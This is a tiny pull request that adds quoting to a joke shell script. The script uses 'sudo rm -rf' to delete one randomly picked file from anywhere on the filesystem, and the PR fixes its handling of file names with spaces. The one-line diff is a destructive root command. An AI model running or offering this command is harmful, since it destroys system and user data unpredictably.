### PR TITLE
Add quotes for file names with whitespace

### DIFF
--- a/static/one-less-to-go.sh
+++ b/static/one-less-to-go.sh
@@ -1,1 +1,1 @@
-sudo rm -rf $(sudo find / -type f -print0 | shuf -n1 -z)
+sudo rm -rf "$(sudo find / -type f -print0 | shuf -n1 -z)"


### PR DESCRIPTION
Note: Files named with trailing newlines not supported.